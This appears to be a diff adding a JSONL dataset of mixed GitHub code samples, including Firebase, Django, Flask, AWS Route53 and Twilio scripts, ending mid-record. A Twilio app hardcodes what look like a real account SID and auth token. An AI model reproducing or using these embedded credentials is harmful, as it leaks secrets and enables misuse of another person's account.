diff --git "a/1607.jsonl" "b/1607.jsonl" new file mode 100644--- /dev/null +++ "b/1607.jsonl" @@ -0,0 +1,2247 @@ +{"seq_id":"8769043944","text":"import firebase_admin\nfrom firebase_admin import credentials\nfrom firebase_admin import firestore\n\nif not firebase_admin._apps:\n cred = credentials.Certificate(\n '/Users/manishsingh/Documents/Study/meal_entry_python1/rassoi-767af-firebase-adminsdk-q09j7-a66f37f511.json')\n default_app = firebase_admin.initialize_app(cred, name=\"new2\")\n\ndb = firestore.client(default_app)\n\n\n# ,\"qgAmuXBvsRMXpQDUvxS0FraQiQH3\", \"qnxzsG184Gfp17RDnvGdAg6DFu23\"]\nuser_id_list = [\"qgAmuXBvsRMXpQDUvxS0FraQiQH3\"]\n\nfor user_id in user_id_list:\n ingredients = db.collection(u'ingredients').stream()\n print(user_id)\n meal_id_list = []\n for i, doc in enumerate(ingredients):\n\n doc_ref = db.collection(u'ingredients').document(\n doc.id).get().to_dict()\n inged_id = doc.id\n inged_name = doc_ref[\"english\"]\n inged_name_hindi = doc_ref[\"hindi\"]\n inged_img = doc_ref[\"img\"]\n ingred_payload = {\n u'inged_id': inged_id,\n u'english': inged_name,\n u'hindi': inged_name_hindi,\n u'img': inged_img,\n u'recipe_names': [],\n u'user_uid': user_id,\n u\"status\": \"unavailable\",\n u\"meal_count\": 0,\n u\"audit\": 0\n }\n\n doc_name = user_id+inged_id\n db.collection(u'meal_ingred').document(\n doc_name).set(ingred_payload)\n","repo_name":"rassoi/DataManipulation","sub_path":"copydata/copy_ingreds.py","file_name":"copy_ingreds.py","file_ext":"py","file_size_in_byte":1377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"38161724435","text":"from django.urls import path\nfrom django.contrib.auth import views as auth_views\nfrom django.contrib.staticfiles.urls import staticfiles_urlpatterns\nfrom django.contrib import admin\nfrom django.conf.urls import url\n\nfrom clients import views as client_views\nfrom meetings import views as meeting_views\nfrom topics import views as topics_views\nfrom shedules import views as shedules_views\nfrom pdfs.views import PDF\nfrom questionnaires import views as questionnaires_views\nfrom questions import views as question_views\n\nurlpatterns = [\n\n #Admin\n url(r'^admin/', admin.site.urls),\n\n #Login\n url(r'^$', auth_views.LoginView.as_view(template_name='login.html'), name='login'),\n url(r'^logout/$', auth_views.LogoutView.as_view(next_page='login'), name='logout'),\n\n #Users\n path('perfil/', client_views.client_show, name='client_show'),\n path('novo_usuario', client_views.new_client, name='client_new'),\n path('editar_perfil/', client_views.client_update, name='client_edit'),\n path('excluir_perfil/', client_views.client_delete, name='client_delete'),\n path('lista_de_usuarios/', client_views.list_users, name='client_list'),\n\n #Meetings\n path('reunioes/', meeting_views.list_meeting, name='meeting_list'),\n path('detalhes_reuniao/', meeting_views.show_meeting, name='meeting_show'),\n path('nova_reuniao/', meeting_views.new_meeting, name='meeting_new'),\n path('editar_reuniao/', meeting_views.edit_meeting, name='meeting_edit'),\n path('excluir_reuniao/', meeting_views.delete_meeting, name='meeting_delete'),\n\n #Topic\n path('novo_topico/', topics_views.new_topic, name='topic_new'),\n path('excluir_topico//', topics_views.delete_topic, name='topic_delete'),\n\n #Shedule\n path('nova_pauta/', shedules_views.new_shedule, name='shedule_new'),\n path('editar_pauta//', shedules_views.edit_shedule, name='shedule_edit'),\n path('excluir_pauta//', 
shedules_views.delete_shedule, name='shedule_delete'),\n path('detalhes_pauta//', shedules_views.show_shedule, name='shedule_show'),\n\n #Quiz\n path('novo_questionario/', questionnaires_views.new_quiz, name='quiz_new'),\n path('editar_questionario//', questionnaires_views.edit_quiz, name='quiz_edit'),\n path('excluir_questionario//', questionnaires_views.delete_quiz, name='quiz_delete'),\n\n #Question\n path('ver_questionario//', question_views.show_question,\n name='quiz_show'),\n path('editar_pergunta///', question_views.edit_question,\n name='question_edit'),\n path('deletar_pergunta///', question_views.delete_question,\n name='question_delete'),\n path('visualizar_questionario//', question_views.respond_question,\n name='question_show'),\n path('ver_respostas//', question_views.question_list,\n name='question_list'),\n\n #PDF\n path('pdf/', PDF.as_view(), name='pdf_show'),\n]\n\n\nurlpatterns += staticfiles_urlpatterns()","repo_name":"FGAProjects/Projeto-Grata","sub_path":"projeto-grata/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"6240909374","text":"from flask import Flask, send_from_directory, request, render_template\nimport os\nfrom bloom560m import Bloom560m\n\napp = Flask(__name__)\n\n@app.route(\"/\")\ndef index():\n return render_template('index.html', result=\"\")\n\n\n@app.route(\"/bloom560m/request\", methods=['POST', 'GET'])\ndef bloom560m_request():\n if request.method != 'POST':\n return render_template('bloom560m.html')\n\n output = {\n 'search_mode' : request.form['search_mode'],\n 'result_length' : int(request.form['result_length']),\n 'request_string' : request.form['request_string'],\n 'result' : ''\n }\n\n if request.form['request_string'] == '':\n return render_template('bloom560m.html')\n\n try:\n if output['search_mode'] == \"BEAM_SEARCH\":\n model = Bloom560m(output['request_string'], output['result_length'])\n output['result'] += model.beam_search()\n print(output['result'])\n elif output['search_mode'] == \"GREEDY_SEARCH\":\n model = Bloom560m(output['request_string'], output['result_length'])\n output['result'] += model.greedy_search()\n print(output['result'])\n elif output['search_mode'] == \"SAMPLING_TOP_SEARCH\":\n model = Bloom560m(output['request_string'], output['result_length'])\n output['result'] += model.sampling_top()\n print(output['result'])\n else:\n return render_template('bloom560m.html', res=\"WRONG INPUT\")\n \n output['result'] = output['result'].split('\\n')\n except Exception as ex:\n output['request_string'] = str(ex)\n\n return render_template('bloom560m.html', **output)\n\n\nif __name__ == \"__main__\":\n app.run()\n","repo_name":"JokerSamStrew/bloom-test","sub_path":"src/flaskapp.py","file_name":"flaskapp.py","file_ext":"py","file_size_in_byte":1706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"17235159958","text":"import numpy as np\nimport pandas as pd\nfrom sklearn import preprocessing\n\nimport my_utils\n\npath_to_project = my_utils.path_to_project\n\n\ndef load_fifa2018_stat():\n data = pd.read_csv(path_to_project + \"Datasets/FIFA 2018 Statistics.csv\")\n\n le = preprocessing.LabelEncoder()\n y = (data['Man of the Match'] == \"Yes\") # Convert from string \"Yes\"/\"No\" to binary\n y = le.fit_transform(y)\n feature_names = [i for i in data.columns if data[i].dtype in [np.int64, np.int64]]\n X = data[feature_names]\n\n return X, 
y, feature_names\n\n\nif __name__ == \"__main__\":\n load_fifa2018_stat()\n","repo_name":"VladisStep/VKR_explanation_model","sub_path":"Global/Test_dataset/data_football.py","file_name":"data_football.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"74695738456","text":"from __future__ import print_function\nfrom __future__ import division\nfrom __future__ import absolute_import\n\nimport unittest\n\nfrom dashboard import change_internal_only\nfrom dashboard.common import testing_common\nfrom dashboard.models import anomaly\nfrom dashboard.models import graph_data\n\n\nclass ChangeInternalOnlyTest(testing_common.TestCase):\n\n def testUpdateBots(self):\n testing_common.AddTests(\n ['ChromiumPerf', 'ChromiumGPU'],\n ['win7', 'mac'],\n {'scrolling': {'first_paint': {}}})\n for key in graph_data.TestMetadata.query().fetch(keys_only=True):\n anomaly.Anomaly(\n test=key, start_revision=15001, end_revision=15005,\n median_before_anomaly=100, median_after_anomaly=200).put()\n\n internal_master_bots = [\n ('ChromiumPerf', 'win7'),\n ('ChromiumGPU', 'mac'),\n ]\n change_internal_only.UpdateBots(internal_master_bots, True)\n self.PatchDatastoreHooksRequest()\n self.ExecuteDeferredTasks(change_internal_only.QUEUE_NAME)\n\n for bot in graph_data.Bot.query().fetch():\n master_name = bot.key.parent().id()\n bot_name = bot.key.id()\n expected = (master_name, bot_name) in internal_master_bots\n self.assertEqual(expected, bot.internal_only)\n\n query = graph_data.TestMetadata.query(\n graph_data.TestMetadata.master_name == master_name,\n graph_data.TestMetadata.bot_name == bot_name)\n for test in query.fetch():\n self.assertEqual(expected, test.internal_only)\n\n anomalies, _, _ = anomaly.Anomaly.QueryAsync(\n test=test.test_path).get_result()\n for alert in anomalies:\n self.assertEqual(expected, alert.internal_only)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"endlessm/chromium-browser","sub_path":"third_party/catapult/dashboard/dashboard/change_internal_only_test.py","file_name":"change_internal_only_test.py","file_ext":"py","file_size_in_byte":1734,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"68"} +{"seq_id":"43729265785","text":"import numpy as np\nimport scipy.linalg as al\nimport math\nfrom linesearch import f, df, hessian\nfrom plot import plot3d\n\ndef model(x1, x2, p1=0, p2=0):\n g = df(x1, x2)\n B = hessian()\n return f(x1, x2) + g[0]*p1 + g[1]*p2 + 0.5*(B[0][0]*p1**2 + B[1][1]*p2**2)\n\ndef func(x1, x2, p1=0, p2=0):\n return f(x1+p1, x2+p2)\n\ndef cauchy_point(x1, x2, delta, returnVec=False):\n g = df(x1, x2)\n gvec = np.array([[g[0], g[1]]])\n B = hessian()\n check = (gvec @ B @ gvec.transpose()).flatten()[0]\n print('cauchy_check for tau: {}'.format(check))\n if check <= 0:\n tau = 1\n else:\n tau = min(al.norm(g)**3/(delta*check), 1)\n factor = (tau*delta/al.norm(g))\n\n if returnVec:\n return np.array([factor*g[0], factor*g[1]])\n else:\n return factor*g[0], factor*g[1]\n\ndef dogleg(x1, x2, delta):\n def quadratic(t, a, b, c):\n return a*t**2 + b*t + c\n\n def quadprime(t, a, b):\n return 2*a*t + b\n\n def newton_raphson(a, b, c):\n t = 0.1\n for i in range(100):\n told = t\n t = t - (quadratic(t, a, b, c)/quadprime(t, a, b))\n if (abs(told - t)) < 0.0001 :\n break\n print(abs(told - t))\n return t\n\n def pb(x1, x2):\n g = df(x1, x2)\n B = hessian()\n return (al.inv(B) @ np.array([[g[0], 
g[1]]]).transpose()).transpose().flatten()\n\n def pu(x1, x2, delta):\n return cauchy_point(x1, x2, delta, True)\n\n def tau(lu, lb, delta):\n\n # solving ||pu+(t-1)(pb-pu)||**2 = delta**2\n pc = lb - lu\n pa = 2*lu - lb\n\n # quadratic terms\n a = pc[0]**2+pc[1]**2\n b = 2*(pc[1]*pa[1]+pc[0]*pa[0])\n c = pa[0]**2 + pa[1]**2 - delta**2\n\n print(a, b, c)\n\n #solve quadratic to find t\n return newton_raphson(a, b, c)\n\n def ptau(x1, x2, delta):\n lb = pb(x1, x2)\n lu = pu(x1, x2, delta)\n\n print(lb)\n print(lu)\n\n if al.norm(lu) >= delta:\n g = df(x1, x2)\n gvec = np.array([[g[0], g[1]]])\n return ((delta/al.norm(g)**2)*gvec).flatten()\n\n if al.norm(lb) <= delta:\n return lb\n\n t = tau(lu, lb, delta)\n\n if t >= 0 and t <= 1:\n return t*lu\n else:\n return lu + (t - 1)*(lb - lu)\n\n return ptau(x1, x2, delta)\n\n\ndef iterate(getp, num_iter):\n points = []\n deltas = []\n\n max_delta = 1.0 # decide this?\n delta = 0.5\n nu = 0.15\n\n x = (0, 0)\n points.append(x)\n deltas.append(delta)\n\n for i in range(num_iter):\n #obtain pk\n p = getp(*x, delta)\n print('p: {}'.format(p))\n\n #obtain rhok\n rho = (func(*x) - func(*x, *p))/(model(*x)- model(*x, *p))\n print('rho: {}'.format(rho))\n\n print('before delta: {}'.format(delta))\n #handles the trust region\n if rho < 0.25:\n delta = delta*0.25\n else:\n if rho > 0.75 and al.norm(p) == delta:\n delta = min(2*delta, max_delta)\n print('Increase size')\n else:\n delta = delta\n\n print('after delta: {}'.format(delta))\n\n print('x: {}'.format(x))\n #handles the update\n if rho > nu:\n x = (x[0] + p[0], x[1] + p[1])\n else:\n x = x\n\n points.append(x)\n deltas.append(delta)\n\n print('x: {}'.format(x))\n\n return points, deltas\n\ndef plot(points, deltas):\n import matplotlib.pyplot as plt\n\n ax = plt.gca()\n\n def Circle(x, y, r):\n circle = plt.Circle((x, y), radius=r, fill=False)\n ax.add_patch(circle)\n\n xs = []\n ys = []\n c = []\n for point, delta in zip(points, deltas):\n xs.append(point[0])\n ys.append(point[1])\n Circle(float(point[0]), float(point[1]), delta)\n\n ax.plot(np.array(xs), np.array(ys), \"ro--\")\n plt.axis('scaled')\n plt.show()\n\nif __name__ == \"__main__\":\n points, deltas = iterate(dogleg, 29)\n plot(points, deltas)\n","repo_name":"sachag678/Reinforcement_learning","sub_path":"trust-region-optimization/tro.py","file_name":"tro.py","file_ext":"py","file_size_in_byte":3999,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"68"} +{"seq_id":"23898809185","text":"import subprocess\nimport csv\nimport sys\nimport getopt\nimport json\nimport boto3\n\nawsProfile = ''\naccountName = ''\n\ndef parseArguments(argv):\n global awsProfile\n global accountName\n\n opts, args = getopt.getopt(argv,\"hn:p:\", [\"help\", \"name=\", \"profile=\"])\n\n for opt, arg in opts:\n if opt in (\"-h\", \"--help\"):\n print('get_all_aws_hosted_zone_records.py --profile default --name old_account')\n sys.exit()\n elif opt in (\"-p\", \"--profile\"):\n awsProfile = arg\n elif opt in (\"-n\", \"--name\"):\n accountName = arg\n \n if not awsProfile:\n print(\"Must pass an AWS profile name to use this script\")\n sys.exit(1)\n if not accountName:\n print(\"Must pass a name for the AWS account to use this script\")\n sys.exit(1)\n\n print(f'AWS profile set to \"{awsProfile}\"')\n print(f'Account name set to \"{accountName}\"')\n\nparseArguments(sys.argv[1:])\n\nhostedZonesFile = open(f\"./files/aws/tmp/{accountName}_hosted_zones.json\", 'w')\n\n\nsession = 
boto3.session.Session(profile_name=awsProfile)\nroute53 = session.client('route53')\nroute53_paginator = route53.get_paginator('list_hosted_zones')\nresponse_iterator = route53_paginator.paginate(\n PaginationConfig={\n 'MaxItems': 1000\n }\n)\n\nhostedZonesAccumulator = []\n\nfor page in response_iterator:\n hostedZonesAccumulator.extend(page['HostedZones'])\n\nhostedZonesFile.write(json.dumps(hostedZonesAccumulator, indent=4))\nhostedZonesFile.close()\n\nhostedZonesFile = open(f\"./files/aws/tmp/{accountName}_hosted_zones.json\", 'r')\ndnsRecordsFile = open(f\"./files/aws/{accountName}_dns_records.csv\", 'w', newline=\"\")\ndnsRecordsWriter = csv.writer(dnsRecordsFile, quoting=csv.QUOTE_ALL)\n\nhostedZoneCount = 0\n\nhostedZonesJson = json.load(hostedZonesFile)\nfor zone in hostedZonesJson:\n hostedZoneCount += 1\n hostedZoneId = zone.get('Id')[12:].strip()\n hostedZoneName = zone.get('Name')\n print(f\"Processing {hostedZoneId}\")\n currentZoneFile = open(\"./files/aws/tmp/current_zone_records.json\", 'wb')\n awsCall = subprocess.Popen(['aws', '--profile', awsProfile, '--output', 'json', 'route53', 'list-resource-record-sets', '--hosted-zone-id', hostedZoneId], stdout=subprocess.PIPE)\n filterCall = subprocess.Popen(['jq', '-r', '.\"ResourceRecordSets\"'], stdin=awsCall.stdout, stdout=currentZoneFile)\n filterCall.communicate()\n currentZoneFile.close()\n \n currentZoneFile = open(\"./files/aws/tmp/current_zone_records.json\", 'r')\n currentZoneJson = json.load(currentZoneFile)\n for record in currentZoneJson:\n recordName = record.get('Name', \"N/A\")\n recordType = record.get('Type', \"N/A\")\n recordTTL = record.get('TTL', \"N/A\")\n recordValues = record.get('ResourceRecords',\"N/A\")\n recordAlias = record.get('AliasTarget', \"N/A\")\n dnsRecordsWriter.writerow([accountName, hostedZoneName, hostedZoneId, recordName, recordType, recordTTL, recordValues, recordAlias])\n currentZoneFile.close()\n\nprint(f\"{accountName} has {hostedZoneCount} hosted zones\")\n\nhostedZonesFile.close()\ndnsRecordsFile.close()\n","repo_name":"roerjo/domain-monitoring","sub_path":"get_all_aws_hosted_zone_records.py","file_name":"get_all_aws_hosted_zone_records.py","file_ext":"py","file_size_in_byte":3109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"39275096668","text":"#!python\n# -*- coding: latin-1 -*-\n\"\"\"\n(c) by nobisoft 2016-\n\"\"\"\n\n\n# Imports\n## Standard\n## Contributed\n## nobi\nfrom ObserverPattern import Observer\nfrom PausableObservable import PausableObservable\n\n\n\n# Constants\nAspectName = 'aspect'\nMessageOne = 'no pausing'\nMessageTwo = 'paused on object 1'\nMessageThree = 'paused on class'\n\n\n\n# Observable class\nclass PauseableObservableObject(PausableObservable):\n def __init__(self, identifier):\n super(PauseableObservableObject, self).__init__([AspectName])\n self.identifier = identifier\n self.message = ''\n \n def doChange(self, msg):\n self.message = msg\n self.changedAspect(AspectName)\n \n def getMessage(self):\n return('Observable %s changed (%s)' % (self.identifier, self.message))\n\n\n\n# Observer class\nclass ObserverObject(Observer):\n def updateAspect(self, observable, aspect):\n Observer.updateAspect(self, observable, aspect)\n print(observable.getMessage())\n\n\n\n# Globals\nobservableObject1 = PauseableObservableObject('1')\nobservableObject2 = PauseableObservableObject('2')\nobserverObject = ObserverObject()\n\n\n# Executable Script\nif __name__ == \"__main__\":\n 
observableObject1.addObserverForAspect(observerObject, AspectName)\n observableObject2.addObserverForAspect(observerObject, AspectName)\n observableObject1.doChange(MessageOne)\n observableObject2.doChange(MessageOne)\n print('Pausing updates from observable object 1')\n PausableObservable.pauseUpdates(observableObject1, None, None)\n observableObject1.doChange(MessageTwo)\n observableObject2.doChange(MessageTwo)\n PausableObservable.resumeUpdates(observableObject1, None, None)\n print('Pausing a class')\n PausableObservable.pauseUpdates(PauseableObservableObject, None, None)\n observableObject1.doChange(MessageThree)\n observableObject2.doChange(MessageThree)\n PausableObservable.resumeUpdates(PauseableObservableObject, None, None)\n print('No more pausing')\n observableObject1.doChange(MessageOne)\n observableObject2.doChange(MessageOne)\n","repo_name":"virtualnobi/PausableObserverPattern","sub_path":"PO.py","file_name":"PO.py","file_ext":"py","file_size_in_byte":2072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"16462904056","text":"import albumentations as A\nfrom albumentations.pytorch import ToTensorV2\nimport cv2\n\ntrain_transform = A.Compose([\n # 非破坏性转换\n A.OneOf([\n A.VerticalFlip(p=0.5),\n A.HorizontalFlip(p=0.5),\n A.RandomRotate90(p=0.5),\n A.Transpose(p=0.5), \n ], p=0.7),\n # 非刚体转换\n A.OneOf([\n A.ElasticTransform(p=0.5, border_mode=cv2.BORDER_REFLECT101, alpha_affine=5),\n A.GridDistortion(p=0.5),\n A.OpticalDistortion(p=0.5, distort_limit=2, shift_limit=0.5),\n A.ShiftScaleRotate(p=0.5, scale_limit=0.2, rotate_limit=45, border_mode=cv2.BORDER_REFLECT101),\n ], p=0.7),\n # Dropout & Shuffle\n # A.OneOf(\n # [\n # A.RandomGridShuffle(p=0.5),\n # A.CoarseDropout(p=0.5),\n # ], p=0.7),\n \n # Add occasion blur\n A.OneOf([A.GaussianBlur(p=0.5), A.GaussNoise(p=0.5), A.IAAAdditiveGaussianNoise(p=0.5)], p=0.7),\n\n A.Normalize(mean=(0.485, 0.456, 0.406, 0.45), std=(0.229, 0.224, 0.225, 0.225)),\n ToTensorV2(),\n])\n\nval_transform = A.Compose([\n # A.Resize(256, 256),\n A.Normalize(mean=(0.485, 0.456, 0.406, 0.45), std=(0.229, 0.224, 0.225, 0.225)),\n ToTensorV2(),\n])","repo_name":"liu8526/project","sub_path":"dataset/transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":1212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"29078826459","text":"#16/2/2017\n\nimport copy\n\nclass time:\n hours=0\n minutes=0\n seconds=0\n\n def __init__(self,hours=0,minutes=0,seconds=0):\n self.hours = hours\n self.minutes = minutes\n self.seconds = seconds\n \n def input_values(self):\n print(\"Enter time (hh:mm:ss) : \")\n \n self.hours = int(input(\"Enter hours : \"))\n self.minutes = int(input(\"Enter Minutes : \"))\n self.seconds = int(input(\"Enter seconds : \"))\n \n def print_values(self):\n print(self.hours, ':', self.minutes, ':', self.seconds)\n\n def __add__(self, other):\n self.hours = self.hours + other.hours\n if(self.hours >= 24):\n self.hours -= 24\n self.minutes = self.minutes + other.minutes\n if(self.minutes >= 60):\n self.minutes -= 60\n self.hours += 1\n self.seconds = self.seconds + other.seconds\n if(self.seconds >= 60):\n self.seconds -= 60\n self.minutes += 1\n return time(self.hours, self.minutes, self.seconds)\n\n def __sub__(self, other,t3):\n t3.hours = t3.hours - other.hours\n if(t3.hours < 24):\n t3.hours += 24\n t3.minutes = t3.minutes - other.minutes\n if(t3.minutes < 0):\n t3.minutes += 60\n t3.hours -= 1\n 
t3.seconds = t3.seconds - other.seconds\n if(t3.seconds < 0):\n t3.seconds += 60\n t3.minutes -= 1\n return time(t3.hours, t3.minutes, t3.seconds)\n\n def __str__(self):\n return \"{0}:{1}:{2}\".format(self.hours,self.minutes,self.seconds)\n\nt1=time()\nt2=time()\n\nt1.input_values()\nt1.print_values()\n\nt2.input_values()\nt2.print_values()\n\nt3=copy.copy(t1)\n\nprint(\"t1+t2\",time.__add__(t1,t2))\nprint(\"t1-t2=\",time.__sub__(t1,t2,t3))","repo_name":"rajataneja101/Python-Lab","sub_path":"alternates/classes/time.py","file_name":"time.py","file_ext":"py","file_size_in_byte":1819,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"68"} +{"seq_id":"28789869404","text":"# 典型90-044\n# PyPy only\n# 先頭・末尾使うやつはdeque使ってごり押し\nimport sys\nimport collections\n\nrm = lambda: map(int, sys.stdin.readline().split())\nrl = lambda: list(map(int, sys.stdin.readline().split()))\n\nn, q = rm()\nal = rl()\nd = collections.deque(al)\nfor _ in range(q):\n t, x, y = rm()\n if t == 1:\n d[x-1], d[y-1] = d[y-1], d[x-1]\n elif t == 2:\n d.appendleft(d.pop())\n elif t == 3:\n print(d[x-1])\n","repo_name":"calliope-pro/algorithm","sub_path":"problems/典型90/044.py","file_name":"044.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"11050363064","text":"'''\nfrom twilio.rest import Client\n\n\n# Your Account Sid and Auth Token from twilio.com/console\naccount_sid = 'AC6dde4f2c5dec01ff9c5c650567f2e811'\nauth_token = '5f5708895de328cd555d6184a5e539b1'\nclient = Client(account_sid, auth_token)\n\ncall = client.calls.create(\n to='+17472558546',\n from_='+15052787618',\n url=\"https://demo.twilio.com/welcome/voice/\",\n)\n\nprint(call.sid)\n'''\nimport os\nfrom flask import Flask\nfrom flask import jsonify\nfrom flask import render_template\nfrom flask import request\nfrom flask import url_for\n\nfrom twilio.twiml.voice_response import VoiceResponse, Say\nfrom twilio.rest import Client\n\nTWILIO_ACCOUNT_SID = \"AC6dde4f2c5dec01ff9c5c650567f2e811\"\nTWILIO_AUTH_TOKEN = \"5f5708895de328cd555d6184a5e539b1\"\nTWILIO_CALLER_ID = \"+15052787618\"\nTWILIO_APP_SID = \"AP7c382977057944c9bcb2367679f8fabb\"\n\n# Declare and configure application\napp = Flask(__name__, static_url_path='/static')\napp.config.from_pyfile('local_settings.py')\n\n\n# Route for Click to Call demo page.\n@app.route('/')\ndef index():\n return jsonify({'Hello': 'World!'})\n\n\n\n# Voice Request URL\n@app.route('/call', methods=['POST'])\ndef call():\n # Get phone number we need to call\n phone_number = '+17472558546'\n try:\n twilio_client = Client(TWILIO_ACCOUNT_SID, TWILIO_AUTH_TOKEN)\n\n except Exception as e:\n msg = 'Missing configuration variable: {0}'.format(e)\n return jsonify({'error': msg})\n\n try:\n twilio_client.calls.create(from_=TWILIO_CALLER_ID,\n to=phone_number,\n url='https://api.twilio.com/2010-04-01/Accounts/AC6dde4f2c5dec01ff9c5c650567f2e811/Calls')\n #my_response = VoiceResponse()\n #my_response.dial()\n #my_response.say(\"We've been notified of a call. Are you OK? Say Yes if you are. With other response, we will contact emergency medical services for immediate support.\",\n # voice='woman', language='en-US', loop = 3)\n\n #return str(my_response)\n\n except Exception as e:\n app.logger.error(e)\n return jsonify({'error': str(e)})\n\n\n@app.route('/outbound', methods=['POST'])\ndef outbound():\n my_response = VoiceResponse()\n\n my_response.say(\"Thank you for contacting checking in. 
We have notified emergency medical services\",\n voice='alice')\n # Uncomment this code and replace the number with the number you want\n # your customers to call.\n return str(my_response)\n\n\nif __name__ == '__main__':\n port = int(os.environ.get(\"PORT\", 5000))\n if port == 5000:\n debug = True\n app.run(host='0.0.0.0', port=port)\n\n\n","repo_name":"htn2018-bchiui/alertifyTwilio","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"70325907096","text":"\r\nprint(\"**********contar numeros impares**************\")\r\n#contar numeros impares\r\nLn_numero = []\r\n\r\nLn_rango = int(input((\"ingrese el rango de numeros de la lista:\")))\r\nfor indi in range(Ln_rango):\r\n Ln_valor = int(input(\"ingrese valores numericos:\"))\r\n Ln_numero.append(Ln_valor)\r\n\r\nLn_contador_par = 0\r\nLn_contador_impar = 0\r\n\r\nfor indice in Ln_numero:\r\n if (indice % 2 == 0):\r\n Ln_contador_par += 1\r\n else:\r\n Ln_contador_impar += 1\r\nprint(\" \")\r\nprint(f\"los cantidad de numeros pares son: {Ln_contador_par}\");\r\nprint(\" \")\r\nprint(f\"los cantidad de numeros impares son: {Ln_contador_impar}\");\r\n\r\nprint(\" \")\r\nprint(\"**********Orden inverso**************\")\r\nprint(\" \")\r\n#Orden inverso: Escribe un programa que tome una lista de números y la imprima en orden inverso.\r\nLn_rango = int(input((\"ingrese el rango de numeros de la lista:\")))\r\nLn_lista_num = []\r\n\r\nfor indi in range(Ln_rango):\r\n Ln_valor = int(input(\"ingrese los valores de la lista:\"))\r\n Ln_lista_num.append(Ln_valor)\r\n\r\n#imprimir en orden inverso con la funcion reversed\r\nprint(\"los valores seran mostrados de manera inversa\")\r\nfor indice in reversed(Ln_lista_num):\r\n print(indice)\r\n\r\n\r\nprint(\" \")\r\nprint(\"********** Ordenamiento de una lista **************\")\r\nprint(\" \")\r\n#Ordenamiento de una lista: Escribe un programa que ordene una lista de números ingresada por el usuario de forma ascendente o descendente.\r\nLn_rango = int(input((\"ingrese el rango de numeros de la lista:\")))\r\nLn_list_num = []\r\n\r\nfor indi in range(Ln_rango):\r\n Ln_valor = int(input(\"ingrese los valores de la lista:\"))\r\n Ln_list_num.append(Ln_valor);\r\n\r\nlength = len(Ln_list_num) -1\r\n#metodo burbuja\r\n#Recorrer toda la lista.\r\nfor indice in range(0, length):\r\n #Ordenar los elementos de la lista\r\n for Ln_ind in range(0,length):\r\n if (Ln_list_num[Ln_ind] > Ln_list_num[Ln_ind +1]):\r\n Ln_temporal= Ln_list_num[Ln_ind];\r\n Ln_list_num[Ln_ind] = Ln_list_num[Ln_ind + 1]\r\n Ln_list_num[Ln_ind + 1] = Ln_temporal\r\n\r\nprint('la lista ha sido ordenada exitodamente')\r\n#Imprimir resultados\r\nprint(Ln_list_num)\r\n\r\n\r\n\r\nprint(\" \")\r\nprint(\"********** Búsqueda en una lista **************\")\r\nprint(\" \")\r\n#Búsqueda en una lista: Escribe un programa que busque un elemento específico en una lista ingresada por el usuario y muestre su posición.\r\nLn_rango = int(input((\"ingrese el rango de numeros de la lista:\")))\r\nLn_list_num = []\r\nLn_posicion = -1\r\nLn_indicador =0\r\nfor indi in range(Ln_rango):\r\n Ln_valor = int(input(\"ingrese los valores de la lista:\"))\r\n Ln_list_num.append(Ln_valor);\r\n\r\nLn_buscar = int(input(\"Ingrese el valor que desea buscar:\"));\r\n\r\nfor indi in range(len(Ln_list_num)):\r\n\r\n if (Ln_list_num[Ln_indicador] == Ln_buscar):\r\n Ln_posicion = Ln_indicador\r\n print(f\"el valor {Ln_buscar} se 
encuentra en la posicion {Ln_posicion}\")\r\n #variable indicador\r\n Ln_indicador +=1\r\n\r\nif (Ln_posicion == -1):\r\n print(f\"el valor {Ln_buscar} no se encuentra establecida en la lista\")\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"freddyandreszambrano/PYTHON---Manejo-de-archivos","sub_path":"EXAMEN_PRACTICA_FAZQ.py","file_name":"EXAMEN_PRACTICA_FAZQ.py","file_ext":"py","file_size_in_byte":3055,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"74949677657","text":"import os\nimport datetime\n\ndef convert_to_bytes(size):\n # 将大小转换为字节数\n kb_size = int(float(size) * 1024)\n return kb_size * 1024\n\ndef split_log_by_size(log_path, output_path, size, log_name):\n # 将大小转换为字节数\n size_in_bytes = convert_to_bytes(size)\n\n # 获取当前日期\n current_date = datetime.datetime.now().date()\n\n # 构造切割日期\n split_date = current_date.strftime(\"%Y-%m-%d\")\n\n # 构造切割后的文件名\n file_name, file_ext = os.path.splitext(os.path.basename(log_path))\n new_file_name = os.path.join(output_path, f\"{split_date}_{log_name}_part1{file_ext}\")\n\n with open(log_path, 'rb') as file:\n chunk = file.read(size_in_bytes)\n\n # 判断第一个切片的大小是否满足切割标准\n if len(chunk) < size_in_bytes:\n print(f\"{log_name} 日志大小小于切割标准\")\n return\n\n part_num = 1\n\n while True:\n with open(new_file_name, 'wb') as part_file:\n part_file.write(chunk)\n\n part_num += 1\n new_file_name = os.path.join(output_path, f\"{split_date}_{log_name}_part{part_num}{file_ext}\")\n\n chunk = file.read(size_in_bytes)\n\n if not chunk:\n break\n\n # 清空原日志文件\n open(log_path, 'w').close()\n\n # 输出日志切割完成的信息\n print(f\"{log_name} 